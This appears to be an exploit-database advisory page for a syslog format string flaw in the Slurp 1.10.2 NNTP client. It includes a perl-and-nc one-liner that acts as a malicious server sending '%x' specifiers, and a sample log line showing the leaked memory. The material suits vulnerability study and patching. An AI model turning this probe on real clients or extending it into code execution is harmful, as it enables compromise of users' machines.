Slurp 1.10.2 - SysLog Remote Format String

Risk: High
Local: No
Remote: Yes

# Exploit Title: Slurp 1.10.2 - SysLog Remote Format String # Date: 2020-07-27 # Author: Milad Karimi slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems. It may be possible for a remote server to execute code on a vulnerable client. slurp offers functionality that allows the software to write messages to the system log. A format string vulnerability in the syslog function may allow a malicious server to supply a custom format string that writes to an arbitrary address in memory. perl -e 'print "BY BY BY \n666 %x%x%x\n'" | nc -l -p 112 Then check /var/log/messages for something like: slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c'

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top